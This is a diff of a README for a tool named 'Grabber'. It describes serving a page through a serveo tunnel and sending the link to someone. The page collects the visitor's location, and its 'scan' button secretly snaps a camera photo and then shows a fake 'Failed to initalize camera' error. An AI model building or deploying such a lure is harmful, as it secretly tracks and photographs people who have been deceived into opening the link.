cons0le7/Grabber/README.md

 - Start the server on `http://localhost:3000`
 - Create a tunnel to expose your server to the web with serveo.
 - Output a link where the server can be accessed.

-Copy link and send to user.
+Copy the link and send to test device.
 When user clicks link it will request location and display their coordinates on a map.
-If they click the scan button the
+If they click the scan button, browser will request camera access and snap picture in the background, followed by a popup: "Failed to initalize camera."